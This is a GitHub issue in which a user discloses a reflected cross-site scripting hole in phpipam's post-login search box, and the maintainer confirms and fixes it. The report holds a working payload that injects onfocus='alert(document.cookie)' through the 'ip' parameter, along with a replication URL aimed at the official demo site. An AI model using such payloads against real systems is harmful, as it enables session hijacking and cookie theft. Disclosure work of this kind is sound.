Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Cross Site script #1521

Closed
OldFRE opened this issue Oct 26, 2017 · 2 comments
Closed

Cross Site script #1521

OldFRE opened this issue Oct 26, 2017 · 2 comments
Assignees
Labels

Comments

@OldFRE
Copy link

OldFRE commented Oct 26, 2017

payload:
/?ip=555-555-0199@example.comoxkrl'onfocus%3d'alert(document.cookie)'autofocus%3d'vc2hr

Utilization method:

  1. the first account password login
  2. direct copy payload to the domain name back at site

Vulnerability location:
Home search box after login

Official demo vulnerability replication :
http://demo.phpipam.net/?ip=555-555-0199@example.comoxkrl'onfocus%3d'alert(document.cookie)'autofocus%3d'vc2hr

@phpipam
Copy link
Owner

phpipam commented Oct 27, 2017

Hi, thanks for reporting, also via email, I can confirm issue. Will provide a fix.

@phpipam phpipam self-assigned this Oct 27, 2017
@phpipam phpipam added the bug label Oct 27, 2017
@phpipam phpipam added this to the 1.3 milestone Oct 27, 2017
@phpipam
Copy link
Owner

phpipam commented Oct 27, 2017

Fixed. Thanks

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
Projects
None yet
Development

No branches or pull requests

2 participants